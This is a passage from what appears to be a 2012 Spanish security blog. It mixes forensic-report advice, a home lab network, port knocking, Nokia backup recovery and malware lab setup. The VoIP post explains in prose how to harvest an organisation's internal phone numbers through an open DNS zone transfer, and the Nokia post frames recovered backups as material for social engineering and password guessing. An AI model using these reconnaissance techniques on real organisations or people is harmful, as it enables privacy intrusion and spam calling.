El punto final, pero será indudablemente lo primero que se lee del informe, lo constituyen las conclusiones. En algunos informes (especialmente en aquellos de una voluminosidad considerable) se presentan casi al principio, a modo de informe ejecutivo. Si en los puntos anteriores el investigador era parte importante, aquí lo es todo. No existe ni método, ni herramienta, ni nada, salvo experiencia, buen hacer o capacidad de análisis y síntesis en lo que apoyarse. Aquí realmente es donde se juega todo y donde existe la diferencia en que alguien pueda llegar a ser considerado inocente por una empresa o bien piense en iniciarse una acción judicial. Es el momento de reflejar relaciones, de presentar las pruebas en toda su crudeza, en defender los patrones detectados que indican conductas reiteradas y que puede marcar el gradiente final de una sanción (no es lo mismo un hecho aislado que algo que se realiza con asiduidad).

Es importante abstraerse de las circunstancia, al igual que si fuéramos jurado, y obviar el hecho de que lo que se escribe podría conllevar la cárcel para alguien. Las conclusiones son la síntesis y el desenlace del caso. Un mayor número de conclusiones no tiene por qué reflejar siempre un mejor trabajo. A veces se exponen datos inconexos y sin sentidos que distraen de la acción principal y que resultan perniciosos para un juicio, puesto que la otra parte los identificará claramente y los utilizará para desmontar el pericial realizado. Poco y bien planteado es mejor que mucho y desdibujado.

Un informe además de los anexos que correspondieran puede acompañarse por la solvencia del analista forense. Refleja su pericia y no da pie a que se pueda dudar de su validez. Hay que tener presente que quien suscriba el informe se encuentra ligado a la necesidad de prestar declaración en el juicio, en calidad de testigo pericial.

Un informe podría presentar flecos o la necesidad de obtener información que ha sido imposible conocer de antemano siempre y cuando exista una causa justificada, por ejemplo la aparición de una información como direcciones IP públicas que solo se encuentra en posesión de los proveedores de Internet. Pero eso es parte del siguiente post: pruebas anticipadas.

Si quieres un acercamiento a un tipo de informe pericial de carácter “oficial” en el siguiente enlace puedes descargar un informe forense de Interpol sobre los ordenadores y equipos informáticos de las FARC decomisados por Colombia. 

20 may 2012

Informe Flu – 72

Comenzamos con el resumen de la semana:Lunes 14 de Mayo

Martes 15 de Mayo

Miércoles 16 de Mayo

Jueves 17 de Mayo

Viernes 18 de Mayo

Sábado 19 de Mayo

19 may 2012

Chrome ya es el navegador más utilizado

Tal y como apuntaba hace unas semanas, durante este pasado mes de Marzo, y según W3schools.com, Chrome se ha aupado con la corona de rey de navegadores. Ya sea por la capacidad de la maquinaria publicitaria de Google (campañas en youtube, en instalables de software, Campañas en las principales plataformas de ads, etc) o por el boca a boca entre usuarios, los hechos están ahí y aunque por poco, Chrome ha superado a Firefox, antiguo rey de navegadores desde 2009.

Veremos como los chicos de Firefox mueven pieza y si Microsoft con su Internet Explorer relegado un distanciado tercer puesto hace algo o se deja llevar.

Opera y Safari, siguen siendo los últimos de la fila, a pesar de ser navegadores multiplataforma, y que este último viene de serie con el cada vez más usado OSX en sus versiones de escritorio e iOS.

Lo importante es que que la puja por el trono siga siendo para dos navegadores independientes y libres, en detrimento del resto de plataformas cerradas. Alguien va a tomar algún apunte de esto? :)

Saludos,

18 may 2012

Video de la ponencia "Caso de Anti-Depredadores.org" en la GuadalajaraCON 2012

Buenas a todos, el mes pasado tuvo lugar la Guadalajaracon, evento en el que participó nuestro amigo David Moreno (@4v4t4r), como os comentábamos en este post.  

Acaba de publicarse la ponencia en video que impartió sobre un caso bastante interesante que llevó desde la asociación Anti-Depredadores, con la que colaboramos estrechamente. No os la perdáis.

Os dejamos con el video a continuación:

[youtube WjkniRArYR4 nolink]

Saludos!

17 may 2012

¡Mamá, mamá, se me ha olvidado mi teléfono... y el de mis otros 25.000 amigos!

Buenas a todos, hoy vamos a hablar de una historia basada en hechos reales pero que ha podido recibir cierto dramatismo, como los de las películas de los "States" pero a la española. Imaginaros por un momento que tenéis interés en tener todo el listado de teléfonos internos de una organización, ¿motivaciones para ello? saber por ejemplo el teléfono de alguien que no quiere ser localizado telefónicamente y solo nos deja comunicarnos con él vía email o solo nos permite llamarnos desde un número oculto (vease como ejemplo las ofertas de ADSL, que nos llaman al teléfono para ofrecernos una oferta, pero nunca nos dejan un teléfono de contacto para volver a preguntarles, aunque esto último sea un tema a tratar a parte ya que la mayoría de las veces viene motivado porque tienen bloqueadas las llamadas entrantes).

Ahora supongamos que esa organización utiliza teléfonos VOIP y tiene uno asignado a cada uno de sus miembros. Los números de los teléfonos no están publicados en Internet, así que teóricamente son imposibles de localizar... ¿o no?

Vamos a intentar probar si es posible averiguar este tipo de números de teléfono con un poco de vision, ingeniería social, algún fallo de configuración y una buena herramienta para identificarlo, pongamos como ejemplo, Anubis V1.3 [podría valernos un simple nslookup o dig, pero hay que hacer publicidad de nuestros productos ;)]

La teoría es la siguiente, analizaremos la página web de la organización y en casi la mayoría de las ocasiones localizaremos varios números de teléfono. Supongamos que todos ellos se caracterizan porque tienen los primeros números iguales y los últimos tres o cuatro varían. Por lo que podríamos suponer que esos últimos números fuesen consecutivos dentro de un rango.

Ya sabemos que los teléfonos de esta compañía comenzarían por 91-6-NÚMERO TAPADO-XYZ (91, si se tratase de un prefijo de Madrid), ahora nos faltaría averiguar el XYZ para terminar de averiguar todos los números que queremos localizar. Recordar que al comienzo del artículo hemos dicho que se trataría de teléfonos VOIP, y quizás hasta las letras IP del "Voz sobre IP" nos sirvan para algo... :)

Si consiguiesemos obtener un listado de las direcciones IP de la organización, obtendríamos también las direcciones IP de los teléfonos VOIP, hasta aquí todo bien, y... ¿cuánto os apostáis a que estas IP tienen algo que ver con el número?

En nuestro libro La biblia del Footprinting hablamos de varias maneras de conseguir direcciones IP internas de una organización. Para el ejemplo de hoy nos bastará con aprovechar un fallo de configuración en la transferencia de zona, habilitada hacia el exterior.

Tras solicitar una transferencia de zona recibiríaos el listado entero de direcciones IP de la organización (que podría llegar a ser muy denso por cierto), y entre ellos veríamos como se encuentran algunas IP que terminan exactamente igual que los teléfonos que hemos encontrado en la página web de la organización, ¿casualidad? no creo.... 

Contrastamos así que los teléfonos VOIP se construyen con un rango fijo al comienzo y los últimos números de su dirección IP. Y conseguiríamos de esta manera tan sencilla el listado completo de teléfonos de la organización. Ideal para un ataque de SPAM de marcadores automáticos y para averiguar cualquier teléfono que nos interesase.

Todas las pruebas han sido realizadas dentro de una jaula de faraday... saludos!

16 may 2012

¿Cómo será la red de mi casa?

Si algo nos gusta a los informáticos (o eso creo), es al menos en nuestra casa tener nuestras cosas configuradas a nuestro gusto.

Estuve pensando que me gustaría tener en mi casa configurado, que servicios me gustaría tener y como me sentiría mas agusto.

No tengo la creatividad del próximo creador de Terminators, Lorenzo Martínez, pero no me hará falta lo que me configurado ya me sirve para hacer todo lo que quiera :D

La red que al final me creado tiene este aspecto

Una de las cosas que creía imprescindibles es poner algo de seguridad en mi red local y controlar el tráfico entrante y saliente. Para ello cuento con la tecnología de Untangle, este UTM contiene las siguientes características

  • Web Filter
  •  Protocol Control
  •  Virus Blocker
  •  Spyware Blocker
  •  Phish Blocker
  • Intrusion Prevention
  •  Attack Blocker
  • Firewall
  •  OpenVPN
  • Reports
  •  Spam Blocker
  •  Captive Portal
  •  Ad Blocker

Sin duda son características muy interesantes y que me dan una solución ya instalada para proteger el acceso a mi casa :D

Lo que viene después es mi Rasberrypi, aunque se que de momento el modelo B sólo tiene una tarjeta de red, espero que en el futuro cuando monte esta red pueda tener una placa con dos tarjetas de red, en esta placa instalaré Debian, y haré toda la parte de routing de mi casa, ya que tengo varias reglas para varias cosas que no os puedo contar :P

Aunque aparezca como PC físico tengo un server virtual dedicado al tema de HoneyPot, de momento tengo activo SSHRDP y Wireless que aún no lo he publicado así que puedo obtener todos los ataques que se hacen o bien de manera automática, o bien directamente!

Luego está MI PC, que ya pondré las expecificaciones porque es donde levanto casi todo lo virtual, es una máquina potente :)

Me montado un NAS casero, con FreeNAS, creo que es de las mejores soluciones para un NAS casero y con la seguridad de que está basado en FreeBSD.

En el NAS realizo los backuos cifrados y guardo toda la parte de películas, series y música, comprada toda evidentemente y la guardo ahí, puedo acceder ahí desde MI PC sin problemas.

En MI PC tengo todo un LAB virtual para hacer todos los artículos que publico aquí y todas las cosas que necesito probar, por ejemplo también de alguna formación que este realizando y demás. Ese LAB virtual sale por miVyatta, que seguro que muchos no conocéis. Para mi, Vyatta es la competencia Open Source de CISCO, para alguno seguro pero es que Vyatta tiene cosas muy, pero que muy chulas, os animo a probarlo.

Para separar el tráfico y las estadísticas en Untangle todo sale por Vyatta.

En otro ESXi Server que hay en el mapa tengo un servidor con Ubuntu, unSIEM con Alien Vault y un Windows 2008 Server con active directory instalado.

Como véis el proyecto es grande y no trivial de configurar todo, pero así ya me siento agusto. :D

15 may 2012

Port-Knocking ó ¿Porn King?

Hoy en día es necesario disponer de sistemas de seguridad para evitar los intentos de intrusión en nuestras máquinas y obtener privilegios sobre nuestros datos. Disponer de servicios que nos den accesos a nuestros datos de manera remota son muy útiles hoy en día, si estoy en la oficina y tengo algo en casa que quiero consultar pues, conecto con la IP de mi casa, el puerto... y consulto los datos, los cuales estarán protegidos mediante una contraseña, y alguna barrera como un firewall ¿no?

Vale, están mas o menos protegidos, pero si yo quiero que un servicio esté oculto hasta para mi, debería cerrar el puerto... pero claro no podré acceder a él tampoco. Pero ¿me conviene? la respuesta es sí, puede ser que si, un servicio concreto en un puerto puede estar expuestos a vulnerabilidades que son descubiertas en el día a día, elevación de privilegios, denegaciones de servicio, etc.

La teoría es bastante sencilla, un servidor está a la escucha en una interfaz dedicada, esperando unas secuencias de llamadas, a unos puertos en concreto. Cuando se obtenga la secuencia correcta, se ejecuta el comando que abre el servicio al que realmente se quiere acceder. Las escuchas se realizan a nivel de la capa de enlace, por lo que no hace falta que haya puertos abiertos. Se recomienda que la secuencia no sea consecutiva, ni incremental o decremental, si no que sean aleatorios, lo más difícil de conocer por parte de un posible atacante.

El port-knocking es una técnica bastante curiosa, un tanto oscura, ya que su seguridad se basa en la oscuridad que provocan la secuencia de puertos. No es recomendable en un entorno empresarial, ya que la seguridad por ocultismo no es nada sano en un ámbito empresarial, pero en una red particular, puede ser bastante interesante, para que ataques aleatorios sobre un rango de IP, no prueben con nuestros servicios.

14 may 2012

Un Forense llevado a juicio (VI de X)

Un Forense llevado a juicio (I de X)Un Forense llevado a juicio (II de X)Un Forense llevado a juicio (III de X)Un Forense llevado a juicio (IV de X)Un Forense llevado a juicio (V de X)Un Forense llevado a juicio (VI de X)Un Forense llevado a juicio (VII de X)Un Forense llevado a juicio (VIII de X)Un Forense llevado a juicio (IX de X)Un Forense llevado a juicio (X de X)


 

Una vez que contamos con las evidencias y teniendo claro que el procedimiento seguido ha sido el correcto, es momento de ponerse manos a la obra. No es objeto de esta serie enseñar como analizar evidencias, pero sí de ofrecer consejos para obtener buenos resultados  a la hora de realizar un análisis. Es importante tener en cuenta que cada escenario presenta sus peculiaridades y evidentemente no pueden analizarse de la misma forma un caso donde hay que buscar en un equipo una conversación mantenida de Messenger, donde se produce un acceso ilícito a cuentas de correo electrónico o el tener que detectar la posible acción de aplicaciones maliciosas en un caso de espionaje industrial.

A pesar de que alrededor de la ciencia forense se encuentra rodeado por un halo de mística sensación, en las más de las ocasiones, las tareas de análisis no resultan para nada edificantes. En muchos casos las tareas resultan tediosas y requieren de un gran esfuerzo personal para no caer en la desidia. La mayoría de casos forenses que acaban en juicio tienen mucho que ver con analizar logs o buscar cadenas de caracteres entre el sinfín de ficheros que puede tener un ordenador.

Si bien es cierto que los casos de aplicaciones maliciosas, análisis de memoria, antiforense o esteganografía por poner algunos ejemplos resultan los más interesantes, son menos las circunstancias que conlleven el poder ir a juicio. Es más, la investigación en estos casos puede tener tantos derroteros que ir con una confianza plena en la aportación de las conclusiones al juicio se antoja mucho más difícil. Es mucho más fácil desde un punto de vista formal y procedimental analizar correos, logs o ficheros y por lo tanto que resulte la forma más habitual que un caso tenga un  fin judicial.

Es más, la coyuntura económica actual incide en la proliferación de casos relacionados con despidos que buscan una causa justificada para hacer procedente el mismo (en mucha ocasiones razonada, aunque en otras no tanto). También la competitividad hace que el espionaje industrial o el robo de propiedad intelectual sean otra de los orígenes de casos que se dan a día de hoy. Este tipo de casos se resuelven habitualmente escarbando entre registros o ficheros de datos.

Hay que tener en cuenta que nadie que contrate un caso (por lo menos a día de hoy, aunque esto podría no ser así hace algunos años) lo haga sin tener un objetivo concreto. Analizar “por si tengo una aplicación maliciosa” no suele ser lo más habitual. Si está decidido ir a juicio será porque existe una clara sospecha o tiene indicios razonables. Esto tiene que ser el punto inicial de partida de la investigación. Analizar porque sí, suele ser lo más complejo y muchas veces detrás hay más fantasmas que algo tangible y concreto. Si el resultado no satisface al cliente, fundamentalmente por ver cosas donde no las hay, cobrarlo será más complejo si cabe que realizar la propia investigación.

Al afrontar el análisis deberán tenerse en cuenta una serie de criterios y obtener del cliente unos datos interesantes para la investigación:

  • Definición de la línea temporal. Es crítico en casi cualquier análisis definir tiempos, tanto para acotar la investigación, como para definir las conclusiones siguiendo patrones claramente definidos. Muchas conclusiones deberán apoyarse en esta circunstancia y las vaguedades aquí suelen dar resultados poco satisfactorios.
  • Búsqueda de elementos o palabras clave. En ocasiones los indicios estarán indefinidos pero resulta totalmente indispensable tener consciencia de qué buscar. Un nombre, una web o una dirección de correo suelen ser datos que el cliente puede llegar a facilitar y suponen un buen punto de origen para analizar con consecuencia. Sin estos datos claros hay que despedirse de un análisis rápido y fructífero.
  • ¿Quién es quién? Es vital conocer lo máximo posible de las personas involucradas. Usuarios afectados, direcciones, teléfonos, etc., son elementos que en determinados escenario son vitales. A veces en la búsqueda de conversaciones almacenadas en un equipo no aparecen nombres directamente pero sí por ejemplo motes. Establecer un cuadro relacional puede resultar clarificante en determinadas circunstancias. No sería el primer caso que nos encontráramos que tras una investigación se tuviera la convicción de la existencias de relaciones sentimentales desconocidas para la propia organización (también para sus propias parejas).

Mirar más allá de lo que se tiene, resulta vital para el caso y sobre todo no perder evidencias por excesiva precaución. Nunca deberíamos descartar la posibilidad de incorporar nuevas evidencias a un escenario. Cuando se destapa el inicio del caso, por retirada de un ordenador o comunicación a los investigados, pudiera resultar que la información sensible estuviera en otro equipo y así dar margen a que estas evidencias pudieran ser eliminadas. Es importante hacer notar esta posibilidad al cliente para que puedan tomarse medidas oportunas o plantear una estrategia de adquisición de evidencias  con mayor alcance del previsto inicialmente. Por ejemplo si hay sospechas aunque no totalmente fundadas sobre una persona, debería  procederse a clonar el disco de su equipo desde el inicio por si la investigación base y conductora del caso derive también en la necesidad de tener que analizarlo a posteriori.

Este punto resulta especialmente conflictivo puesto que poner en guardia o crear supuestos sospechosos de personas que pudieran ser inocentes generan una desestabilidad palpable en el trabajo. Pero hay que valorar siempre con el cliente, si el caso está por encima de todo, a excepción de la ley. Es decir recuperar el disco sin un procedimiento válido desde el punto de vista judicial o el procedimental de la empresa recogido en el uso de medios, puede dar con un caso invalidado por muy claras que muestren ser las conclusiones. Siempre hay que tener en mente la adquisición y preservación  de las evidencias sobre el resto de circunstancias.

A la hora de analizar resulta casi imprescindible buscar en todos los lugares, incluidos en los potencialmente inexistentes. Más allá de los escenarios antiforense, muchos casos requieren de la recuperación de ficheros eliminados. Un “sospechoso” obsesivo puede tener el cuidado necesario para eliminar ficheros o datos que puedan ser contraproducentes para él. Pero también hay que ser conscientes de que lo mismo no posea los conocimientos totalmente necesarios para que la eliminación sea irreversible.

Recuperar ficheros eliminados es una tarea que lleva mucho tiempo y a veces sin resultado nada positivos y difíciles de gestionar en un juicio, pero al menos puede dar indicios importantes. Medio fichero es mejor que nada. Las herramientas forense tales como EnCase o FTK cuentan con módulos para hacer búsqueda de ficheros eliminados y sobre ellos poder hacer también uso de búsqueda de palabras o frases clave. La dificultad aquí puede residir en hacer creíble la prueba de cara al juicio.

Es también vital en muchos casos forenses, el buscar patrones más o menos definidos de conducta. Usuarios que se conectan a unas horas concretas, correos que se envían desde unas IP específicas que aunque dinámicas pertenecen a un mismo rango, frases o palabras muy especiales, representa ejemplos de patrones. En un caso reciente una misma cuenta de usuario que accedía a datos de otros usuarios de forma ilegítima, era utilizada por dos personas diferentes. Se llegó a esta conclusión, además de por otros indicios, porque en el método de validación empleado se usaban dos patrones de autenticación totalmente diferentes aunque válidos (dominio\usuario y usuario@dominio).

Analizar patrones, a priori puede resultar algo complejo,  sin embargo con una buena tabla delante puede ser un potente instrumento. A nadie se le exige tener la mente analítica, relacional y obsesiva de John Forbes Nash, pero sí es una capacidad interesante para un forense contar con capacidades de razonamiento.  En muchos de los casos en los que he participado acaban destacando determinados patrones que dan pie para la elaboración de las conclusiones. También he observado que convenientemente introducidas en el juicio, citar los patrones constituye un puntal esencial para conducir las alegaciones y/o conclusiones que se presentan ante el Juez.

[caption id="" align="alignright" width="298" caption="Fuente: "Life""][/caption]

Los patrones deberían ser cotejados con el cliente, puesto que a veces se pueden observar apreciaciones muy interesantes. Por ejemplo todos los días se producen conexiones desde una misma máquina pero un día determinado no se produjeron. Cotejándolo con información mantenida por la organización, puede resultar que ese día la persona sospechosa no acudió a trabajar puesto que fue al médico. Estos datos deberán ser introducidos en el informe como parte esencial de las conclusiones derivadas.

Es muy importante ser escrupuloso con los análisis. Ser un buen analista forense, implica ser organizado. Hay que tener claro desde el principio cuales son los objetivos pero sin desdeñar alternativas. Si eres caótico saltarás desde una pista a otra sin una clara visión y esto se refleja indefectiblemente sobre el informe y como no en un mal trabajo.  Hay que anotar cualquier apreciación relativa a información obtenida o el cruce de resultados. No hay que confiar nunca en la buena cabeza puesto que ante la avalancha de información que se obtendrá, se acabarán perdiendo muchos detalles importantes. Es una buena práctica llevar un cuaderno de bitácora donde anotar cualquier apreciación, evidencia, horas, fechas, nombres, etc.

Las herramientas son una parte importante de los análisis, pero ni mucho menos la más esencial. La experiencia, eficacia y buen hacer del especialista, son la clave para obtener resultados válidos y fiables. Las herramientas sin unas manos que las dirijan no servirán de nada. La experiencia me ha mostrado lo potente que pueden ser aplicaciones “de andar por casa” en manos expertas. No existen varitas ni teclas mágicas para afrontar un caso. Cada uno de ellos es un mundo y es muy importante sobre todo perder prejuicios y  conclusiones preconcebidas. El asesino no siempre es el mayordomo. Y a veces también una visión lejana de un tercero en momentos de bloqueo puede dar aire fresco.

 

13 may 2012

Informe Flu – 71

Comenzamos con el resumen de la semana:Lunes 7 de Mayo
  • El lunes Marc nos trajo su artículo Listado de ExploitPacks, en el que hablaba sobre los precios de estos peculiares kits.

Martes 8 de Mayo

Miércoles 9 de Mayo

  • El miércoles publicamos un videotutorial sobre la herramienta Wikto, en el que enseñamos a utilizarla como ejemplo contra el panel de control de Flu: Videotutorial sobre Wikto

Jueves 10 de Mayo

Viernes 11 de Mayo

Sábado 12 de Mayo

12 may 2012

La cagaste, Burt Lancaster – Los peores fracasos de la informática I

A los que tengamos un 3 delante de nuestra edad, nos sonará la expresión “La cagaste, Burt Lancaster”  pronunciada tal cual, puesta de moda por Hombres G y que intentaron usar como título de su segunda película (por problemas legales, al final se llamó “Suéltate el Pelo“).

No temais, que no se me ha ido la cabeza (no más de lo habitual) y no voy a hacer un post ni de Hombres G, ni de Burt Lancaster. El tema del post va a ser de “cagadas” del mundo de la informática, algunas realmente sorprendentes. Me ha inspirado el hecho de recibir hoy un mail de google avisando que Google Wave está exhalando sus últimos extertores antes del apagón final el 30 de Abril de este mismo año. En el mundo de la informática, igual que en el resto de los “mundos”, ser grande no es garantía de triunfo.

Precisamente, como hay demasiadas, lo he dividido en un par de entradas. Hoy, la primera de ellas :)

Apple III: La compañía que hoy tiene un valor en bolsa igual que todo el mercado selectivo español IBEX35, estuvo mucho tiempo con las patitas en arenas movedizas. Tras el éxito comercial del Apple II, el primer PC que Apple comercializó de forma masiva, los chicos de la manzana se la pegaron (y mucho) sacando al mercado un producto con problemas en su hardware y que para colmo era inferior y más caro a lo que había en el mercado (todavía no contaban con fan boys como los de ahora) por lo que el fracaso fue estrepitoso. Además, muchos de los usuarios que esperaban esta renovación, se pasaron directamente al mundo IBM-PC que estaba dando unos resultados muy buenos. Modelos posteriores del Apple III no le hicieron levantar cabeza y la situación tampoco mejoró con la llegada del Apple Lisa. A pesar de incluir algo novedoso como en interfaz de usuario gráfico y un ratón en el mundo de los ordenadores personales, su alto precio (cerca de 10.000$) y la lentitud de su interface gráfica, hicieron que no cuajara más allá que en algunos nichos muy concretos.

IBM PCjr: Los chicos del gigante azul, intentaron sacar al mercado unaversión barata de su PC, que tan buenos resultados les estaba dando en el terreno empresarial. A pesar de contar con novedades tan interesantes para la época como incluir un teclado inalámbrico (por infrarrojos) o una arquitectura de 16 bits (por entonces, el mundo digital se movía en 8bits) estas se convertirían en parte de las causa de su fracaso. El teclado no se podía alejar más de un metro de la CPU, y las baterías tenían una duración muy corta. Por ambos motivos, el uso de este teclado era más un snobismo que algo práctico. La arquitectura,  introdujo problemas de compatibilidad con muchísimas aplicaciones. IBM ofreció una serie de parches, cambió el teclado e intentó sacar algún kit de ampliación, pero tuvo que asumir la derrota discontinuando el PCjr a los 3 años de salir al mercado.

Palm: Corrian los locos 90 cuando Palm Inc, sacaba al mercado Palm Pilot. La empresa había fracasado anteriormente con su primera PDA (Zoomer) y se había sacado un dinerete vendiendo su sistema de reconocimiento de caracteres (graffiti) a Apple y su software de sincronización con el PC de escritorio a HP. La salida al mercado de Palm Pilot, es un boom. Su sistema operativo, PalmOs, e incluso el diseño, es licenciado a casi 20 marcas y se convierte en el objeto de deseo entre frikis y los nuevos yupiesDotCom. Bendecida por los “tecnomesías” de la época, comienza su ocaso ante la espectacular subida de HP con WindowsCE, y las primeras uniones entre PDA y teléfono móvil como los Nokia Communicator. Aunque reacciona, sacando los PalmTreo, la lentitud de su sistema y su alto precio, termina por hundir la compañía, que incluso saca una versión con Windows Mobile. En 2010, Palm, o lo que queda de ella, es adquirida por HP.

Google SC (Shit Collection): Que google es la caña es una opinión. Que es una de las mejores empresas como tal, es algo que pocos se atreverán a negar. No obstante, lleva consigo unos cuantos fracasos mas o menos sonados.

Líder en buscadores y publicidad on-line, no ha sido capaz de cuajar en redes sociales ni en comunicación p2p, ni en prácticamente cualquier otra cosa.

Orkut: La red social Orkut, fue adquirida por Google Brasil en 2004. Fundada por uno de sus empleados, actualmente es muy popular en Brasil y en India. No obstante, en el resto de los países su cuota es ínfima y superada en mucho por otras redes sociales.

Waves: El experimento que iba a ser la joya de la corona de las comunicaciones. Tenía la intención de unificar el concepto de email, Redes sociales, Wikis, pero su dificultad de uso y la falta de penetración entre usuarios con un nivel medio-bajo, lo condenó al fracaso rápidamente. En Abril de este año, se irá a negro.

DodgeBall: Muchos de los usuarios de Foursquare, quizá no sepamos que sus fundadores vendieron la idea y la compañía a Google en 2005. Abandonado en 2009 para crear Google Lattitude, ni uno pudo ni otro puede hacer sombra a Foursquare.

Jaiku: En 2007, Google compra una red social de microblogging centrada en finlandia (sus creadores eran consejeros de Nokia), con la intención de ser competidora directa de Twitter. Jaiku tiene muy pocos usuarios por aquel entonces, y técnicamente es muy superior a esta (jaiku por aquel entonces ya tenia la misma capacidad que twitter en la actualidad con twitter images, por ejemplo). A los dos años, google decide por sorpresa darle carpetazo, en pleno apogeo de las redes sociales.

Buzz: Atacada por los defensores de la privacidad desde sus comienzos, Google arranca Buzz a principios de 2010, cerrándolo a finales de 2011. Sin saber muy bien para que sirve y con empresas que no terminan de saber como explotarla, los usuarios se muestran desconcertados, y a penas se le da utilidad a la red social.

- Google+: A pesar de que incluso yo mismo pensé que podría ser el principio de una gran amistad, lo cierto es que Google+ no termina de despegar y, tras un comienzo espectacular (a base de heredar los usuarios y contactos de gmail) la desidia comienza a hacer estragos en esta red social.

11 may 2012

Analizando backups de terminales Nokia con Noki v2.1

Buenas a todos, aunque en los últimos años el imperio Nokia cae en picado con el crecimiento de los iPhone y los terminales con Android, siguen siendo muchos usuarios los que prefieren este tipo de móviles, destacando a las empresas que tienen este tipo de terminales como móvil corporativo de trote por su robustez y bajo coste.

En muchas ocasiones, en procesos de auditoría me he encontrado con backups de móviles nokia en discos duros y PCs (administradores que hacen backups antes de reinstalarlos o formatearlos y se olvidan los backup "por ahí", usuarios que realizan backups de sus móviles y los dejan en sus equipos, móviles antiguos que reutilizan de otros empleados y que guardan backups antes de comenzar a utilizarlos, etc.)

Estos backup suelen contener información muy interesante, agendas con los teléfonos de contactos, calendario de eventos, cumpleaños y fechas señaladas, fotografías, notas, etc. Esta información puede ser muy interesante de cara a realizar ataques de ingeniería social y obtener más información o incluso adivinar contraseñas (recordar que habremos conseguido nombres de amigos y familiares y fechas señaladas, si es un usuario que utiliza el móvil para ello claro).

Para reconstruir los backup de los móviles nokia la herramienta que más me gusta es Noki de NokiSoft.  Esta herramienta soporta los formatos .nbu, .nfb, .nfc, .cdb y .arc.

El uso de esta herramienta es básico, se selecciona el archivo con el backup y automáticamente se recupera.

Así que nota importante, no os dejéis vuestros backups de móviles por el disco duro, que puede ser una fuga de información bastante peligrosa.

Saludos!

10 may 2012

Laboratorio de malware

 

Llevo muchos días preparando dos presentaciones relacionadas con temas de malware, cuando te dedicas a hacer ingeniería inversa, haciendo análisis estático de malware o símplemente realizar un análisis dinámico del sample, requiere, o al menos es importante, el tener un laboratorio montado para realizar estas pruebas. Haré una serie de artículos de como montar un laboratorio de malware para el análisis de muestras y que herramientas se pueden usar, tanto en análisis estático como en análisis dinámico.

Lo mejor para realizar estas pruebas es montar un escenario virtualizado, existen herramientas que detectan la máquina virtual y no se ejecutan pero ya lo veremos mas adelante…

Como software para montar el escenario virtual podemos usar Virtualbox oVMware, en mi caso uso VMware me conozco el software y me gusta, pero os recomiendo usar Virtualbox, es una pasada y funciona de maravilla :)

Como máquina víctima usaremos un Windows XP SP2, el tamaño de la partición debería de ser de 50GB y el Windows debería de estar sin software adicional salvo el que viene instalado y el que pondremos aquí.

No hace falta asignarle mucha memoria RAM a la máquina, pensad que será una máquina que usaremos para hacer el análisis dinámico del malware y, por lo tanmto necesitamos que sea una máquina rápida que podamos trabajar de manera cómoda.

Con VMware tenemos la facilidad de poder analizar todo el tráfico de la máquina virtual recogiendo el tráfico directamente de la tarjeta virtual deVMware.

Será muy fácil el poder hacer el análisis del tráfico de esta manera.

Es muy importante realizar el análisis del tráfico desde fuera de la máquina virtual, ya que ciertos samples de malware pueden no mostrar el tráfico real